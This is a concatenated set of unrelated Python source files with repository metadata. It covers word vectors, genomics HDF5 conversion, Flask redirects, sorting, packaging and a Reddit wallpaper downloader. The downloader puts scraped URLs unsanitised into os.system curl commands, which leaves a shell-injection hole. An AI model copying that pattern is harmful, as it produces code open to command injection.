cooccurence_matrix = cooccurence_matrix.tocoo()
multi_rsum_csum_value = np.multiply(col_sum.take(cooccurence_matrix.col),
row_sum.take(cooccurence_matrix.row)).A.squeeze()
assert (multi_rsum_csum_value >=0).all() #check overflow
multi_rsum_csum = sp.coo_matrix((multi_rsum_csum_value,
(cooccurence_matrix.row, cooccurence_matrix.col)))
deno = t_sum*cooccurence_matrix.tocsr() - multi_rsum_csum.tocsr()
row_d = np.multiply(np.sqrt(row_sum) , np.sqrt((t_sum - row_sum)))
col_d = np.multiply(np.sqrt(col_sum ), np.sqrt((t_sum - col_sum)))
assert (row_d >=0).all() #check overflow
assert (col_d >=0).all() #check overflow
col_d_target_value = col_d.take(cooccurence_matrix.col).A.squeeze()
col_d_target = sp.coo_matrix((col_d_target_value,
(cooccurence_matrix.row, cooccurence_matrix.col)))
col_d_target.data = 1 / col_d_target.data
row_d_target_value = row_d.take(cooccurence_matrix.row).A.squeeze()
row_d_target = sp.coo_matrix((row_d_target_value,
(cooccurence_matrix.row, cooccurence_matrix.col)))
row_d_target.data = 1 / row_d_target.data
cooccurence_matrix = deno.multiply(col_d_target.tocsr()).multiply(row_d_target.tocsr())
##set negative values to 0
cooccurence_matrix[cooccurence_matrix < 0] = 0
##take square roots
cooccurence_matrix = np.sqrt(cooccurence_matrix)
#apply svd
if self.svd_dim:
#TODO : remove less frequent rows to accelerate computing speed of svd
cooccurence_matrix = cooccurence_matrix.asfptype()
svd = TruncatedSVD(self.svd_dim, algorithm = 'arpack')
cooccurence_matrix = svd.fit_transform(cooccurence_matrix) # vocab_len * vector_dim
self.svd = svd
self.word_vectors = cooccurence_matrix
self.init_sims()
return self
def init_sims(self, replace=False):
#方法本身就已經normalize
if getattr(self, 'word_vectors_norm', None) is None or replace:
self.word_vectors_norm = self.word_vectors
def get_similarity(self, term1, term2):
v1 = self.get_word_vector(term1)
v2 = self.get_word_vector(term2)
sim = np.corrcoef(v1, v2)[0, 1]
return sim
def one2many_similarity(self, one_v, many_v, normalized=True):
one_v = one_v.reshape(1, -1) # 1*dim
many_v = many_v.reshape(-1, self.get_dim()) # n*dim
# NOTE!
# there are some zero vectors with std = 0, causing errors(ZeroDivision) when calculating corrcoef!
std = np.std(many_v, axis=1)
nonzero_mask = std != 0
n_vectors = many_v.shape[0]
sims = np.zeros(n_vectors)
vectors_with_std = many_v[nonzero_mask,]
# sims_with_std = np.apply_along_axis(lambda x: np.corrcoef(x,mean)[0,1], 1,vectors_with_std)
sims_with_std = (1 - cdist(one_v, vectors_with_std, metric='correlation')).squeeze() #faster!!
sims[nonzero_mask] = sims_with_std
return sims
|
[
"[email protected]"
] | |
d76c17214f347a505da9a63ba79dea1cba99813d
|
ee69a67e61ca7b51a57e85255d0387099a5eea4c
|
/scripts/shapeit_2_hdf5.py
|
7773d1a09625662411768d7d2e296f3de959f068
|
[
"MIT"
] |
permissive
|
melcampos/snakeit
|
95a6e742daa15771b576e129ed89bbeb8932e513
|
e2fc32a33989cad28761e2321825628dc8439925
|
refs/heads/master
| 2020-07-09T03:16:30.961516 | 2017-07-25T10:43:59 | 2017-07-25T10:43:59 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,481 |
py
|
#! /usr/bin/python
__author__ = 'Nicholas Harding'
import numpy as np
import h5py
import os.path
import gzip
from itertools import islice
if os.path.isfile(snakemake.output.hdf5):
raise FileExistsError("outfile already exists")
else:
h5file = h5py.File(snakemake.output.hdf5, mode="w")
chrom = h5file.create_group(snakemake.wildcards.chrom)
# Create the groups
grp_calldata = chrom.create_group("calldata")
grp_variants = chrom.create_group("variants")
# read samples file
fh_samples = gzip.open(snakemake.input.samples, 'rb')
samples_header = fh_samples.readline()
samples_desc = fh_samples.readline()
sample_info = [s.decode() for s in fh_samples.readlines()]
sample_names = np.array([s.rstrip().split(' ')
for s in sample_info], dtype="|S8")[:, 1]
n_sam = len(sample_names)
# count lines
number_sites = snakemake.params.max_sites
print("Max sites set at {0} snps.".format(number_sites))
# create objects
samples = chrom.create_dataset('samples', data=sample_names)
position = grp_variants.create_dataset('POS', (0, ),
maxshape=(number_sites, ),
dtype="int",
compression="gzip",
compression_opts=1)
identify = grp_variants.create_dataset('ID', (0, ),
maxshape=(number_sites, ),
dtype="S8",
compression="gzip",
compression_opts=1)
reference = grp_variants.create_dataset('REF', (0, ),
maxshape=(number_sites, ),
dtype="S1",
compression="gzip",
compression_opts=1)
alternate = grp_variants.create_dataset('ALT', (0, ),
maxshape=(number_sites, ),
dtype="S1",
compression="gzip",
compression_opts=1)
genotypes = grp_calldata.create_dataset('genotype', (0, n_sam, 2),
maxshape=(number_sites, n_sam, 2),
dtype="int",
compression="gzip",
compression_opts=1)
fh_haplotypes = gzip.open(snakemake.input.haplotypes, 'rb')
n = 0
print("loading haplotypes...")
while True:
print(n, "read...")
chunk = list(islice(fh_haplotypes, snakemake.params.chunk_size))
if not chunk:
break
print("chunk has", len(chunk), "lines")
as_np = np.array([line.rstrip().split(b' ') for line in chunk])
print("chunk read and converted to numpy:", as_np.shape)
position.resize(as_np.shape[0] + position.shape[0], axis=0)
position[n:] = as_np[:, 2].astype('int')
identify.resize(as_np.shape[0] + identify.shape[0], axis=0)
identify[n:] = as_np[:, 1]
alternate.resize(as_np.shape[0] + alternate.shape[0], axis=0)
alternate[n:] = as_np[:, 4]
reference.resize(as_np.shape[0] + reference.shape[0], axis=0)
reference[n:] = as_np[:, 3]
genotypes.resize(as_np.shape[0] + genotypes.shape[0], axis=0)
genotypes[n:] = as_np[:, 5:].astype('int').reshape((-1, n_sam, 2))
n += len(chunk)
h5file.close()
|
[
"[email protected]"
] | |
cce1e5cc0fba01f33051132e3981e03cec379801
|
a070182e6443995031340802e74d1e65a85bdca3
|
/bluelog/utils.py
|
4975d944d9c5eebe4486d47ab3fea78ee7fa681c
|
[] |
no_license
|
huazhicai/bluelog
|
f86a042a5f3ada46515920c45a0b1452a40d4ad9
|
c2a46ac25cbba4ecf7d4e0985ef9010ddae34c01
|
refs/heads/master
| 2020-04-04T16:33:27.910658 | 2019-01-03T09:59:52 | 2019-01-03T09:59:52 | 156,082,797 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 670 |
py
|
try:
from urlparse import urlparse, urljoin
except ImportError:
from urllib.parse import urlparse, urljoin
from flask import request, redirect, url_for
def is_safe_url(target):
ref_url = urlparse(request.host_url)
test_url = urlparse(urljoin(request.host_url, target))
return test_url.scheme in ('http', 'https') and ref_url.netloc == test_url.netloc
def redirect_back(default='blog.index', **kwargs):
for target in request.args.get('next'), request.referrer:
if not target:
continue
if is_safe_url(target):
return redirect(target)
return redirect(url_for(default, **kwargs))
|
[
"[email protected]"
] | |
6bccc2ddc4d09d7ad97468de9e225678e1b8f627
|
7c91ff172ba9898386cc84f3d0384ad0f12fc118
|
/ex_morita/sort/bubble_sort.py
|
73afe7fe46cd96bde16690a1dea53eb8bf61cfb3
|
[] |
no_license
|
HokutoMorita/algorithm
|
cfec809df236b3fb8dd607812ec21110bca0df48
|
285c24fde771be3e1e81fb1d7ad1e14bfc83c55d
|
refs/heads/main
| 2023-01-14T18:05:33.041621 | 2020-11-15T05:52:01 | 2020-11-15T05:52:01 | 311,011,103 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 965 |
py
|
from typing import List
"""
Bubble sortのオーダー数
- Average: O(n**2)
- Best: O(n)
- Worst: O(n**2)
"""
def bubble_sort(numbers: List[int]) -> List[int]:
len_numbers = len(numbers)
for i in range(len_numbers):
for j in range(len_numbers - 1 - i):
# だからO(n**2)になるのか!!
## 加えて、-iとすることで、limitを一つずつずらしている
if numbers[j] > numbers[j+1]:
# 左側にある要素が右側にある要素よりも大きい場合は、要素を入れ替える
tmp_j = numbers[j]
tmp_j_1 = numbers[j+1]
numbers[j] = tmp_j_1
numbers[j+1] = tmp_j
return numbers
if __name__=='__main__':
nums = [2, 5, 1, 8, 7, 3]
result = bubble_sort(nums)
print(result)
import random
nums_random = [random.randint(0, 1000) for i in range(10)]
print(bubble_sort(nums_random))
|
[
"[email protected]"
] | |
7e5fc8246ba12f67b9efe8fe1433a80bbd6460fe
|
d4fe66ef7b5bc1745aeb4054b30575fb25a053f4
|
/setup.py
|
d838e226a7de7b9cd782061fb6f64b3134bc06cc
|
[
"Apache-2.0"
] |
permissive
|
jay-johnson/antinex-client
|
796c753bc9df8498f25dca994920b26d8828a940
|
76a3cfbe8a8d174d87aba37de3d8acaf8c4864ba
|
refs/heads/master
| 2021-04-15T15:55:39.670061 | 2020-09-04T19:49:15 | 2020-09-04T19:49:15 | 126,577,469 | 6 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,053 |
py
|
import os
import sys
import warnings
import unittest
try:
from setuptools import setup
except ImportError:
from distutils.core import setup
from setuptools.command.test import test as TestCommand
class PyTest(TestCommand):
user_options = [('pytest-args=', 'a', "Arguments to pass to pytest")]
def initialize_options(self):
TestCommand.initialize_options(self)
self.pytest_args = ''
def run_tests(self):
import shlex
# import here, cause outside the eggs aren't loaded
import pytest
errno = pytest.main(shlex.split(self.pytest_args))
sys.exit(errno)
"""
https://packaging.python.org/guides/making-a-pypi-friendly-readme/
check the README.rst works on pypi as the
long_description with:
twine check dist/*
"""
long_description = open('README.rst').read()
cur_path, cur_script = os.path.split(sys.argv[0])
os.chdir(os.path.abspath(cur_path))
install_requires = [
"colorlog",
"coverage",
"flake8",
"matplotlib",
"numpy",
"pandas",
"pep8",
"pipenv",
"pycodestyle",
"pylint",
"recommonmark",
"requests",
"seaborn",
"sphinx",
"sphinx-autobuild",
"sphinx_rtd_theme",
"spylunking",
"tox",
"tqdm",
"unittest2",
"mock"
]
if sys.version_info < (3, 5):
warnings.warn(
"Less than Python 3.5 is not supported.",
DeprecationWarning)
# Do not import antinex_client module here, since deps may not be installed
sys.path.insert(0, os.path.join(os.path.dirname(__file__), "antinex_client"))
setup(
name="antinex-client",
cmdclass={"test": PyTest},
version="1.3.6",
description=("AntiNex Python client"),
long_description_content_type='text/x-rst',
long_description=long_description,
author="Jay Johnson",
author_email="[email protected]",
url="https://github.com/jay-johnson/antinex-client",
packages=[
"antinex_client",
"antinex_client.scripts",
"antinex_client.log"
],
package_data={},
install_requires=install_requires,
test_suite="setup.antinex_client_test_suite",
tests_require=[
"pytest"
],
scripts=[
"./antinex_client/scripts/ai",
"./antinex_client/scripts/ai_env_predict.py",
"./antinex_client/scripts/ai_get_prepared_dataset.py",
"./antinex_client/scripts/ai_get_job.py",
"./antinex_client/scripts/ai_get_results.py",
"./antinex_client/scripts/ai_prepare_dataset.py",
"./antinex_client/scripts/ai_train_dnn.py"
],
use_2to3=True,
classifiers=[
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: Apache Software License",
"Operating System :: OS Independent",
"Programming Language :: Python :: 3.5",
"Programming Language :: Python :: 3.6",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Software Development :: Libraries :: Python Modules",
])
|
[
"[email protected]"
] | |
d69a39808d6f68572bc01c15f5e876462397f0eb
|
4dac40a30e7bbb86ab829fed0cb6f12ff7fa0216
|
/djwiki/wiki/models.py
|
0e7d732c83f68d3e3e9fb72063d8346168ff24ae
|
[] |
no_license
|
gzpgg3x/pythonDiary
|
cc039b716c810f99d5a12b0f4167a711cd6ea18f
|
0c3af53dc635d5ff40adad89dce146d6684e162e
|
refs/heads/master
| 2021-01-10T19:55:41.130511 | 2013-04-21T04:37:10 | 2013-04-21T04:37:10 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 201 |
py
|
from django.db import models
class Page(models.Model):
name = models.CharField(max_length=40, unique=True)
content = models.TextField()
def __unicode__(self):
return self.name
|
[
"[email protected]"
] | |
422bb18f8a7bcb7c258bbd7e723a5fffce02797e
|
d8aca998189d273c279b017fa17ed76c3f3419b6
|
/main.py
|
4f6afb25018e8bce3867c90b15f250cb8993aedf
|
[] |
no_license
|
konstantin-kotochigov/otus
|
0016a5b616b6da5b829e825a78f6c6f0c1e89595
|
57e35c415f26441015c402382962e8bceed95c33
|
refs/heads/master
| 2022-01-23T01:42:57.150184 | 2019-04-30T12:47:47 | 2019-04-30T12:47:47 | 181,729,680 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 5,018 |
py
|
import sys
from pyspark.sql import SparkSession
from hdfs import InsecureClient
import time
import datetime
from cj_loader import CJ_Loader
from cj_predictor import CJ_Predictor
from cj_export import CJ_Export
def main():
if len(sys.argv) < 4:
raise Exception("command must have 3 arguments")
# Specifies to Merge
send_update = True if sys.argv[1]=="send" else False
# Overrides option to refit the model
arg_refit = True if sys.argv[2]=="refit" else False
# Sets sample rate
arg_sample_rate = sys.argv[3]
# send_update = True if len(sys.argv) >= 2 and (sys.argv[1]=="1") else False
print("Send_update = {}".format(send_update))
update_model_every = 60*24*7 # in seconds
start_processing = time.time()
# Common classes
spark = SparkSession.builder.appName('analytical_attributes').getOrCreate()
# Working Directories
orgid = "21843d80-6f2c-402f-9587-9c501724c646"
work_dir = "/data/"+orgid+"/.dmpkit/models/"
hadoop_namenode = "http://159.69.59.101:50070"
hdfs_client = InsecureClient(hadoop_namenode, "dmpkit")
if "models" not in hdfs_client.list("/data/"+orgid+"/.dmpkit/"):
hdfs_client.makedirs("/data/"+orgid+"/.dmpkit/models")
# Check whether We Need to Refit our Model
model_modification_ts = next(iter([x[1]['modificationTime'] for x in hdfs_client.list(work_dir, status=True) if x[0] == "model.pkl"]), None)
model_needs_update = True if (model_modification_ts == None) or (time.time() - model_modification_ts > update_model_every) or (arg_refit) else False
print("Refit = {}".format(model_needs_update))
# Load Data
cjp = CJ_Loader(spark)
cjp.set_organization(orgid)
cjp.load_cj(ts_from=(2019,1,1), ts_to=(2019,1,31))
# cjp.load_cj(ts_from=(2018,12,1), ts_to=(2018,12,31))
# cjp.cj_stats(ts_from=(2010,12,1), ts_to=(2020,12,31))
cjp.cj_data.createOrReplaceTempView('cj')
cjp.extract_attributes()
cjp.process_attributes(features_mode="seq", split_mode="all")
data = cjp.cj_dataset
# data.to_parquet(work_dir+"/data_export.parquet")
# Sample Dataset to Reduce Processing Time
# if arg_sample_rate != 1.0:
# (train_index, test_index) = StratifiedShuffleSplit(n_splits=1, train_size=arg_sample_rate).get_n_splits(data, data.target)
# Make Model
predictor = CJ_Predictor(work_dir, hdfs_client)
predictor.set_data(data)
predictor.optimize(batch_size=4096)
start_fitting = time.time()
result = predictor.fit(update_model=model_needs_update, batch_size=4096)
scoring_distribution = result.return_score.value_counts(sort=False)
print("Got Result Table with Rows = {}".format(result.shape[0]))
print("Score Distribution = \n{}".format(scoring_distribution))
# Make Delta
df = spark.createDataFrame(result)
dm = CJ_Export(orgid, "model_update", hadoop_namenode, "schema.avsc")
mapping = {
'id': {
'fpc': {
'primary': 10008,
'secondary': 10031
}
},
'attributes': {
'return_score': {
'primary': 10127,
'mapping': {
'1': 10000,
'2': 10001,
'3': 10002,
'4': 10003,
'5': 10004
}
}
}
}
# Publish Delta
print("Send Update To Production = {}".format(send_update))
dm.make_delta(df, mapping, send_update=send_update)
finish_fitting = time.time()
# Store Run Metadata
log_data = [datetime.datetime.today().strftime('%Y-%m-%d %H-%m'),
str(cjp.cj_data_rows),
str(cjp.cj_df_rows),
str(cjp.cj_dataset_rows),
str(model_needs_update),
str(send_update),
str(round((start_fitting - start_processing)/60, 2)),
str(round((finish_fitting - start_fitting)/60, 2)),
str(predictor.train_auc),
str(predictor.test_auc),
str(predictor.test_auc_std),
str(scoring_distribution[0]),
str(scoring_distribution[1]),
str(scoring_distribution[2]),
str(scoring_distribution[3]),
str(scoring_distribution[4])
]
log = ";".join(log_data)
log_path = work_dir+"log.csv"
if "log.csv" not in hdfs_client.list(work_dir):
data_with_header = 'dt;loaded_rows;extracted_rows;processed_rows;refit;send_to_prod;processing_time;fitting_time;train_auc;test_auc;test_auc_std;q1;q2;q3;q4;q5\n'+log + "\n"
hdfs_client.write(log_path, data=bytes(data_with_header, encoding='utf8'), overwrite=True)
else:
with hdfs_client.read(log_path) as reader:
prev_log = reader.read()
new_log = prev_log + bytes(log + "\n", encoding='utf8')
hdfs_client.write(log_path, data=new_log, overwrite=True)
main()
|
[
"[email protected]"
] | |
5f3d4294cb56833f92b4727c486bf706a63f7707
|
ab2712490238827c3298f3dada3fd111a31da761
|
/OpenSourceBlogger/addThumbsDown.py
|
99d0c5ad9315c0779d1453c698443ddcf6f059f1
|
[] |
no_license
|
aniket10/blogging-platform
|
4da002f83da981b6527ca774eb23a424a677bcea
|
195ebce7097ddaad4210e2faa657cf9075dd6432
|
refs/heads/master
| 2016-09-07T18:48:53.279441 | 2013-12-18T18:31:49 | 2013-12-18T18:31:49 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 643 |
py
|
import cgi
import webapp2
import urlparse
from google.appengine.ext import db
from Blogs import Blogs
class addThumbsDown(webapp2.RequestHandler):
def get(self):
form = cgi.FieldStorage()
blogId = form['blogid'].value
url = form['dest_url'].value
# sessionId = int(form['sessionId'].value)
b = Blogs.get_by_id(int(blogId))
b.thumbsdown = b.thumbsdown + 1
b.put()
self.redirect(url, False, False, None, None)
application = webapp2.WSGIApplication([
('/addThumbsDown.*',addThumbsDown)
], debug=True)
|
[
"[email protected]"
] | |
26952bdc611861509bd368811c1b243e394f7d45
|
a32049cdf8cb3403e8e54ddd661f8bb506cca99b
|
/first_project/first_app/urls.py
|
f627fd5ffdf7c929f3138c22f3c628b8dc0cf27b
|
[] |
no_license
|
akhileshvvn/django-deployment-example
|
5a3beb8205f2905c99808e983baaf0f8a7a23772
|
45317bb6166527054541e52c8a986f44342ea958
|
refs/heads/master
| 2022-04-15T08:17:02.615307 | 2020-04-11T07:54:19 | 2020-04-11T07:54:19 | 254,815,719 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 501 |
py
|
from django.urls import path,re_path
from django.conf.urls import url
from . import views
#TEMPLATE TAGGING
app_name = 'first_app'
urlpatterns = [
re_path(r'^index/', views.index, name=''),
re_path(r'formindex/',views.form_name_view,name='form_name'),
re_path(r'^relative/$',views.relative,name = 'relative'),
re_path(r'^other/$',views.other,name='other'),
re_path(r'^register/$',views.register,name='register'),
re_path(r'^user_login/$',views.user_login,name='user_login')
]
|
[
"[email protected]"
] | |
297d9dd46444739c518dba755a52553bc66bc674
|
464efb61bdf6651b2e016e68bc6766bd7dacdf79
|
/src/server/config.py
|
82bf73a6729ba154b555fe888c43baf12f8c656c
|
[] |
no_license
|
maksfourlife/transnfc_web
|
81e891eb9345c2b7e78ab15af99e043c340d3dee
|
7e110a298f4c2a9c98a38dda5c6322ac7735d46c
|
refs/heads/master
| 2023-03-14T07:16:19.508762 | 2020-04-08T13:09:22 | 2020-04-08T13:09:22 | 247,476,183 | 0 | 0 | null | 2021-03-20T03:27:32 | 2020-03-15T13:53:31 |
Python
|
UTF-8
|
Python
| false | false | 109 |
py
|
class Config:
SQLALCHEMY_DATABASE_URI = "sqlite:///server.db"
SQLALCHEMY_TRACK_MODIFICATIONS = False
|
[
"[email protected]"
] | |
d2cbc077321e6797286ece37e88d6968738be31c
|
89556ba7cd23520117010f4c7d99683fa4994bf0
|
/djangosite/contact/models.py
|
5de38890f11ccb96c91cd9024cfea9c07ada8a3f
|
[] |
no_license
|
MinHyoung/play
|
13e0b9e6e58e1e073f37b691e090115d09380bce
|
164b640709cd9319fd2eddeafb8024a07f262cc9
|
refs/heads/master
| 2021-01-17T23:56:33.805323 | 2013-11-15T17:04:16 | 2013-11-15T17:04:16 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 370 |
py
|
from django.db import models
class Contact(models.Model):
GENDER_CHOICES = (
(1, 'Male'),
(2, 'Female'),
)
subject = models.CharField(max_length=100, blank=True)
message = models.TextField(blank=True)
sender = models.EmailField(max_length=100)
gender = models.IntegerField(choices=GENDER_CHOICES)
cc = models.BooleanField()
|
[
"[email protected]"
] | |
72bc2e20ca357ce0505185fce963ff64d12a537f
|
d215516889a11f516ce7617d3b48f41b272fd23d
|
/testCases/200109-delayScenario1/sixMachineDelayStep2.py
|
498cbe8e1f986d7885612f9513f020a60d0eb87f
|
[
"MIT"
] |
permissive
|
thadhaines/PSLTDSim
|
c0b61e510afed1de03f14341230dc76b29f36440
|
1bc598f3733c1369c164f54249e5f7757e6bf466
|
refs/heads/master
| 2021-08-17T15:33:35.881354 | 2020-05-01T10:00:51 | 2020-05-01T10:00:51 | 173,911,705 | 0 | 0 |
MIT
| 2019-07-15T21:15:26 | 2019-03-05T09:02:07 |
Python
|
UTF-8
|
Python
| false | false | 1,484 |
py
|
# Format of required info for batch runs.
debug = 0
AMQPdebug = 0
debugTimer = 0
simNotes = """
No AGC Response (no delay)
Delay over response test
Loss of generation in area 2 at t=2
Delayed action by area 1
AGC in both areas
"""
# Simulation Parameters Dictionary
simParams = {
'timeStep': 1.0, # seconds
'endTime': 60.0*8, # seconds
'slackTol': 1, # MW
'PY3msgGroup' : 3, # number of Agent msgs per AMQP msg
'IPYmsgGroup' : 60, # number of Agent msgs per AMQP msg
'Hinput' : 0.0, # MW*sec of entire system, if !> 0.0, will be calculated in code
'Dsys' : 0.0, # Damping
'fBase' : 60.0, # System F base in Hertz
'freqEffects' : True, # w in swing equation will not be assumed 1 if true
# Mathematical Options
'integrationMethod' : 'rk45',
# Data Export Parameters
'fileDirectory' : "\\delme\\200109-delayScenario1\\", # relative path from cwd
'fileName' : 'SixMachineDelayStep2',
'exportFinalMirror': 1, # Export mirror with all data
'exportMat': 1, # if IPY: requies exportDict == 1 to work
'exportDict' : 0, # when using python 3 no need to export dicts.
'deleteInit' : 0, # Delete initialized mirror
'assumedV' : 'Vsched', # assummed voltage - either Vsched or Vinit
'logBranch' : True,
}
savPath = r"C:\LTD\pslf_systems\sixMachine\sixMachineTrips.sav"
dydPath = [r"C:\LTD\pslf_systems\sixMachine\sixMachineDelay.dyd"]
ltdPath = r".\testCases\200109-delayScenario1\sixMachineDelayStep2.ltd.py"
|
[
"[email protected]"
] | |
43d49f630d353fd008900b0b05ae5b3a0d17fd2b
|
c3a68b3e226ba4b04edff61f311a31beda8a3ac2
|
/Week2/Day5/word cloud.py
|
75fe7e6ba592ac00c97020c661c58acb4ff18a50
|
[] |
no_license
|
sgowtham36/CompetitiveProgramming
|
3fa477820c5651d4d38c96d5a7790ab74757637e
|
835a8f84b578f6421eb6d9b5111a847446117fe3
|
refs/heads/master
| 2020-03-21T12:45:08.328286 | 2018-07-21T09:23:27 | 2018-07-21T09:23:27 | 138,570,032 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,432 |
py
|
import unittest
import re
class WordCloudData(object):
def __init__(self, inp):
l = re.split('\.| |\?|\!|:|\- |, |\(|\)',inp)
d = {}
for i in l:
if i!='':
j = i.title()
if i in d:
d[i] += 1
elif j in d:
d[i] = 1+d[j]
d.pop(j, None)
else:
d[i] = 1
self.words_to_counts = d
# Test Cases
class Test(unittest.TestCase):
def test_simple_sentence(self):
input = 'I like cake'
word_cloud = WordCloudData(input)
actual = word_cloud.words_to_counts
expected = {'I': 1, 'like': 1, 'cake': 1}
self.assertEqual(actual, expected)
def test_longer_sentence(self):
input = 'Chocolate cake for dinner and pound cake for dessert'
word_cloud = WordCloudData(input)
actual = word_cloud.words_to_counts
expected = {
'and': 1,
'pound': 1,
'for': 2,
'dessert': 1,
'Chocolate': 1,
'dinner': 1,
'cake': 2,
}
self.assertEqual(actual, expected)
def test_punctuation(self):
input = 'Strawberry short cake? Yum!'
word_cloud = WordCloudData(input)
actual = word_cloud.words_to_counts
expected = {'cake': 1, 'Strawberry': 1, 'short': 1, 'Yum': 1}
self.assertEqual(actual, expected)
def test_hyphenated_words(self):
input = 'Dessert - mille-feuille cake'
word_cloud = WordCloudData(input)
actual = word_cloud.words_to_counts
expected = {'cake': 1, 'Dessert': 1, 'mille-feuille': 1}
self.assertEqual(actual, expected)
def test_ellipses_between_words(self):
input = 'Mmm...mmm...decisions...decisions'
word_cloud = WordCloudData(input)
actual = word_cloud.words_to_counts
expected = {'mmm': 2, 'decisions': 2}
self.assertEqual(actual, expected)
def test_apostrophes(self):
input = "Allie's Bakery: Sasha's Cakes"
word_cloud = WordCloudData(input)
actual = word_cloud.words_to_counts
expected = {"Bakery": 1, "Cakes": 1, "Allie's": 1, "Sasha's": 1}
self.assertEqual(actual, expected)
unittest.main(verbosity=2)
|
[
"[email protected]"
] | |
9f6267ca0c70fa24732c18a22c4ecf9dfcd51a24
|
02e570630224d80217769916a35a6d662d95296c
|
/ex24.py
|
ed6ef14127c86f62596cc65b94f87136f9820ed4
|
[] |
no_license
|
nikslav/Exercises-LPTHW
|
c2cd6e17b8843f5d9b90f804bb5dcbe2f1471047
|
06038a4245f01f58f6a04f20b6e6a38c7329376c
|
refs/heads/master
| 2021-05-16T03:19:38.716460 | 2020-02-12T21:59:11 | 2020-02-12T21:59:11 | 31,510,230 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 798 |
py
|
print "Let's practice everything."
print 'You\'d need to know \'bout escapes with \\ that do \n newlines and \t tabs.'
poem = """
\tThe lovely world
with logic so firmly planted
cannot discern \n the needs of love
nor comprehend passion from intuition
and requires an explanation
\n\t\twhere there is none.
"""
print "------------"
print poem
print "------------"
five = 10 - 2 + 3 - 6 # = 5
print "This should be five: %s" % five
def secret_formula(started):
jelly_beans = started * 500
jars = jelly_beans / 1000
crates = jars / 100
return jelly_beans, jars, crates
start_point = 10000
beans, jars, crates = secret_formula(start_point)
start_point = start_point
print "We can also do that this way:"
print "We'd have %d beans, %d jars, and %d crates." % secret_formula(start_point)
|
[
"n*****@noreply.com"
] |
n*****@noreply.com
|
955eb6e62f585e0d1aea48906a6f34b58e43e7b7
|
9ee2ff96498a9e0cb3db7829dc9dbb3027d1ec65
|
/17 Letter Combinations of a Phone Number.py
|
8d0e1738e5cd0433eb4e7e0f6680daf9f1c97e5b
|
[] |
no_license
|
Alfredhana/Leetcode-Exercise
|
848c19caf1e3475454e210e8045eb45e48259158
|
6b48e0d7c218d59ca4e7b5deebbc634d3cde9fd8
|
refs/heads/master
| 2022-12-24T20:56:00.333978 | 2020-10-10T06:49:58 | 2020-10-10T06:49:58 | 259,835,167 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 978 |
py
|
# -*- coding: utf-8 -*-
"""
Created on Thu Feb 13 11:44:46 2020
@author: USER
"""
class Solution:
def lettercombinations(self, digits):
print(digits)
phoneMap = {'2':['a', 'b', 'c'],
'3':['d', 'e', 'f'],
'4':['g', 'h', 'i'],
'5':['j', 'k', 'l'],
'6':['m', 'n', 'o'],
'7':['p', 'q', 'r', 's'],
'8':['t', 'u', 'v'],
'9':['w', 'x', 'y', 'z']}
def findcombination(digits, combination):
if len(digits) == 0:
list.append(combination)
else:
for letter in phoneMap[digits[0]]:
findcombination(digits[1:], combination + letter)
list = []
if digits:
findcombination(digits, "")
print( list)
if __name__ == '__main__':
s = Solution()
letters = "79"
print(letters)
s.lettercombinations(letters);
|
[
"[email protected]"
] | |
1d5f94ad567c571b31a903dfa7dc38b92a35aff2
|
279df61e17235e103f34fe34d4e357a0bebd4aee
|
/grabImages.py
|
48e5751e08b3da0b87935caef1f26e9131716668
|
[] |
no_license
|
codemang/RedditWallpaper
|
8b83bc9127a276795939f87e9de9c65b1798a384
|
6b251d7544891fe2803ae6fb44d249b6190a4366
|
refs/heads/master
| 2016-09-15T16:23:49.288375 | 2015-10-09T17:47:44 | 2015-10-09T17:47:44 | 29,942,900 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,769 |
py
|
import os
import re
import datetime
from datetime import timedelta
from os.path import expanduser
timeStructure = '%Y/%m/%d %H:%M:%S' # Format for date/time
timeDiff = timedelta(hours=12) # Amount of time to wait between updates
scheduleFile = '.RedditWallpaper/schedule.txt' # File where last update time is stored
def main():
global scheduleFile
scheduleFile = expanduser("~") + "/" + scheduleFile
# If nothing has been written to schedule.txt, this is the first time grabbing images
if os.stat(scheduleFile).st_size == 0:
print "Empty"
grabImages()
return
# Read the last time the images were updated
f = open(scheduleFile, 'r')
lastTimeUpdated = f.readline().rstrip('\n')
# Grab the current time and strip the decimal place following the time
curTime = datetime.datetime.now()
curTime = curTime.strftime(timeStructure)
curTime = datetime.datetime.strptime(curTime, timeStructure)
# Convert lastTimeUpdated from a string to a datetime object
lastTimeUpdated = datetime.datetime.strptime(lastTimeUpdated, timeStructure)
# If it has been more than timeDiff hours since the last update, update
if lastTimeUpdated + timeDiff < curTime:
grabImages()
return
def grabImages():
# Grab entire HTML of r/EarthPorn
os.system("curl www.reddit.com/r/EarthPorn > output.txt")
# Load HTML of r/EarthPorn into variable
f = open('output.txt', 'r')
body = f.read()
thumbnailRegex = re.compile('<a class="thumbnail.+?href="(.+?)"')
badImgurRegex = re.compile('^https?://(www.)?imgur.com/.+')
goodImgurRegex = re.compile('^https?://i.imgur.com.*')
ppcdnRegex = re.compile('^https?://ppcdn.500px.org.*')
grabImgurRegex = '^https?://(www.)?(imgur.com/.+)'
counter = 1
# For every thumbnail image in the page
for link in re.findall(thumbnailRegex, body):
# If we have already downloaded 10 images, break
if counter > 10:
break;
# If this thumbnail is not from imgur or ppcdn, try again
if not goodImgurRegex.match(link) and not badImgurRegex.match(link) and not ppcdnRegex.match(link):
continue;
if badImgurRegex.match(link):
m = re.search(grabImgurRegex, link)
link = "i." + m.group(2)+".jpg"
# Create an image name for this image and download the image
imageName = "image"+`counter`+".jpg"
command = 'curl -o '+imageName +' '+link + ' > /dev/null'
os.system(command)
# Move the image to the images directory
